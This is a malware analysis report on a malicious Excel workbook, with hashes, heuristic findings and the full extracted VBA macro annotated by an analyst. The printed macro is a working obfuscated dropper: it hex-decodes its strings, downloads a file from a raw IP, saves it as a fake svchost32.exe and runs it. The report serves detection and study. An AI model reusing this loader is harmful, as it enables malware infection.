Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 143d170136d6c825…

MALICIOUS

Office (OLE) / .XLS

459.5 KB Created: 2020-09-29 23:04:07 First seen: 2026-06-14
MD5: ed95409467eec03990f43372a987e9d4 SHA-1: 1dd098a59550143e64bd723018ce6019aa8887dd SHA-256: 143d170136d6c825f2d4a0c49b2978302d884bc946ccee97db8c340e629615ea
188 Risk Score

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  • CreateObject call high OLE_VBA_CREATEOBJ
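    The macro calls CreateObject to instantiate a COM object; in the matched line the ProgID is not a literal but is decoded from a hex string at run time.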
    Matched line in script
    Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  • Workbook_Open macro low OLE_VBA_WBOPEN
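    The workbook defines a Workbook_Open event handler, which Excel runs automatically when the file is opened with macros enabled.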
    Matched line in script
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4894 bytes
SHA-256: 5ebd6f33ab467e73fedc8dc862313043d74a132e32cfab60652e88b65e6b2714
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' ANALYST NOTES (static review of the extracted macro; nothing here was executed).
' Workbook_Open is the Excel event handler that fires when the workbook is opened,
' so everything below runs without further user action once macros are enabled.
' The routine interleaves two kinds of statements:
'   1. worksheet formatting / cell-fill calls (Range, Selection, ActiveCell, data bars),
'      which have no bearing on the payload and appear to be recorded-macro filler
'      used to bury the loader lines;
'   2. the loader itself: three COM objects, one HTTP GET, one binary file write,
'      one process launch.
' Every string the loader needs is passed through fmcizyxudlguufmjjnaw(), the
' hex-pair decoder defined after this Sub, so no ProgID, URL or path is a literal.
' Decoded indicators (network values defanged in these notes):
'   URL       : hxxp://185[.]33[.]85[.]52/FR/BDO-1218.jpg
'   Drop path : C:\Users\Public\svchost32.exe
Range("E2:E9").Select
' Loader variable #1 (untyped): later holds the Microsoft.XMLHTTP object.
Dim bpermttejpxwkhdzdvds
 Selection.FormatConditions.AddDatabar
' Loader variable #2 (untyped): later holds the ADODB.Stream object.
Dim pphipenpjmmxjntrwlno
Selection.FormatConditions(Selection.FormatConditions.Count).ShowValue = True
' Loader variable #3 (untyped): later holds the WScript.Shell object.
Dim eiiufsjqvcpgjrsmhwci
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
' --- filler: data-bar conditional formatting on the current selection ---
With Selection.FormatConditions(1)
.MinPoint.Modify newtype:= xlConditionValueAutomaticMin
.MaxPoint.Modify newtype:= xlConditionValueAutomaticMax
End With
With Selection.FormatConditions(1).BarColor
.Color = 8700771
.TintAndShade = 0
 End With
      Selection.FormatConditions(1).BarFillType = xlDataBarFillGradient
 Selection.FormatConditions(1).Direction = xlContext
 Selection.FormatConditions(1).NegativeBarFormat.ColorType = xlDataBarColor
  Selection.FormatConditions(1).BarBorder.Type = xlDataBarBorderSolid
   Selection.FormatConditions(1).NegativeBarFormat.BorderColorType = _
  xlDataBarColor
  With Selection.FormatConditions(1).BarBorder.Color
  .Color = 8700771
   .TintAndShade = 0
    End With
   Selection.FormatConditions(1).AxisPosition = xlDataBarAxisAutomatic
   With Selection.FormatConditions(1).AxisColor
  .Color = 0
  .TintAndShade = 0
  End With
  With Selection.FormatConditions(1).NegativeBarFormat.Color
  .Color = 255
  .TintAndShade = 0
   End With
 With Selection.FormatConditions(1).NegativeBarFormat.BorderColor
.Color = 255
  .TintAndShade = 0
End With
' --- filler: writes small numbers / a sum formula into cells and autofills them ---
  Range("C2").Select
 ActiveCell.FormulaR1C1 = "2"
 Range("D2").Select
  ActiveCell.FormulaR1C1 = "2"
 Range("E2").Select
 Application.CutCopyMode = False
  ActiveCell.FormulaR1C1 = " = RC[-2]+RC[-1]"
 Range("C2:E2").Select
  Selection.AutoFill Destination:= Range("C2:E7"), Type:= xlFillDefault
  Range("C2:E7").Select
  Range("C7:E7").Select
  Selection.AutoFill Destination:= Range("C7:E9"), Type:= xlFillDefault
  Range("C7:E9").Select
   Range("C9:E9").Select
  Selection.AutoFill Destination:= Range("C9:E10"), Type:= xlFillDefault
  Range("C9:E10").Select
  Range("C10:E10").Select
  Selection.AutoFill Destination:= Range("C10:E13"), Type:= xlFillDefault
  Range("C10:E13").Select
' --- loader stage 1: instantiate COM objects from hex-decoded ProgIDs ---
' Hex decodes to "Microsoft.XMLHTTP" (HTTP client).
Set bpermttejpxwkhdzdvds = CreateObject(fmcizyxudlguufmjjnaw("4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50"))
  Range("D3").Select
' Hex decodes to "ADODB.Stream" (used below to write the response body to disk).
Set pphipenpjmmxjntrwlno = CreateObject(fmcizyxudlguufmjjnaw("41 44 4f 44 42 2e 53 74 72 65 61 6d"))
  ActiveCell.FormulaR1C1 = "5"
' Hex decodes to "WScript.Shell" (used below to start the dropped file).
' The trailing space inside the literal is never read by the decoder's Mid$(…, 2).
Set eiiufsjqvcpgjrsmhwci = CreateObject(fmcizyxudlguufmjjnaw("57 53 63 72 69 70 74 2e 53 68 65 6c 6c "))
  Range("C4").Select
' --- loader stage 2: decode the download URL, the drop path and the run command ---
' Decodes to hxxp://185[.]33[.]85[.]52/FR/BDO-1218.jpg : plain HTTP to a bare IP,
' with a .jpg name although the body is saved and launched as an .exe below.
' None of the three variables assigned here is declared with Dim in this Sub.
vwugwgoruhjzjfianlrf = fmcizyxudlguufmjjnaw("68 74 74 70 3A 2F 2F 31 38 35 2E 33 33 2E 38 35 2E 35 32 2F 46 52 2F 42 44 4F 2D 31 32 31 38 2E 6A 70 67")
  ActiveCell.FormulaR1C1 = "1"
' Decodes to C:\Users\Public\svchost32.exe. The file name imitates the Windows
' svchost.exe service host but sits in a user-writable directory.
geuxdamwomcriooggncw = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
  Range("C5").Select
' Same hex string as the drop path: the command that is run is the dropped file itself.
RUNCMD = fmcizyxudlguufmjjnaw("43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 76 63 68 6f 73 74 33 32 2e 65 78 65")
  ActiveCell.FormulaR1C1 = "2"
' --- loader stage 3: fetch ---
' The verb "GET" is concatenated from single letters, so it never appears whole
' in the source; the third argument False makes the request synchronous.
bpermttejpxwkhdzdvds.Open "G" + "E" + "T", vwugwgoruhjzjfianlrf, False
  Range("D6").Select
bpermttejpxwkhdzdvds.send
  ActiveCell.FormulaR1C1 = "5"
' --- loader stage 4: write the response body to disk ---
' Type = 1 is adTypeBinary: the stream handles raw bytes, not text.
pphipenpjmmxjntrwlno.Type = 1
  Range("D7").Select
  ActiveCell.FormulaR1C1 = "8"
pphipenpjmmxjntrwlno.Open
  Range("C8").Select
' Line matched by OLE_VBA_HTTP_DROP_EXEC: the HTTP response body goes straight
' into the stream. No status code or content check is visible before this write.
pphipenpjmmxjntrwlno.write bpermttejpxwkhdzdvds.responseBody
   ActiveCell.FormulaR1C1 = "6"
  Range("C10").Select
   ActiveCell.FormulaR1C1 = "2"
   Range("D10").Select
' Second argument 2 is adSaveCreateOverWrite: an existing file at the path is replaced.
pphipenpjmmxjntrwlno.savetofile geuxdamwomcriooggncw, 2
' --- loader stage 5: execute ---
' WScript.Shell.Run starts the file just written. Triage pivots: Excel as the
' parent of a process under C:\Users\Public, and outbound HTTP from Excel to a raw IP.
eiiufsjqvcpgjrsmhwci.Run RUNCMD
  ActiveCell.FormulaR1C1 = "3"
  Range("C11").Select
  ActiveCell.FormulaR1C1 = "6"
  Range("D12").Select
  ActiveCell.FormulaR1C1 = "9"
  Range("C12").Select
End Sub
Public Function fmcizyxudlguufmjjnaw(ByVal yelhwsjcdgxzflhpeypp As String) As String
' ANALYST NOTES: string decoder used by Workbook_Open for every ProgID, URL and path.
' Input  : text made of two-digit hex pairs separated by one character,
'          e.g. "4d 69 63 …" (the call sites in this module use a space).
' Output : the string formed by converting each pair to its character code.
' The same result can be reproduced offline by hex-decoding the literals,
' so the macro never has to be run to recover the indicators.
' NOTE(review): the missing space before "Step" and the spaces inside " & H" may be
' artefacts of the report's source formatter rather than the original bytes; confirm
' against the raw olevba output before quoting this function verbatim.
Dim mvbhcdhdgnsuwxriulhy As String
Dim itoiapedszqakutklugw As String
Dim qtoptlxxoeoygcosgsgn As Long
' Advance three characters per iteration: two hex digits plus the separator.
For qtoptlxxoeoygcosgsgn = 1 To Len(yelhwsjcdgxzflhpeypp)Step 3
' Take the two hex digits, prefix them with the hex-literal marker, convert to a
' number with Val, then to a single character with Chr$.
mvbhcdhdgnsuwxriulhy = Chr$(Val(" & H" & Mid$(yelhwsjcdgxzflhpeypp, qtoptlxxoeoygcosgsgn, 2)))
' Append the decoded character to the accumulator.
itoiapedszqakutklugw = itoiapedszqakutklugw & mvbhcdhdgnsuwxriulhy
Next qtoptlxxoeoygcosgsgn
' Return the accumulated plaintext by assigning it to the function name.
fmcizyxudlguufmjjnaw = itoiapedszqakutklugw
End Function

Attribute VB_Name = "Sheet 1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True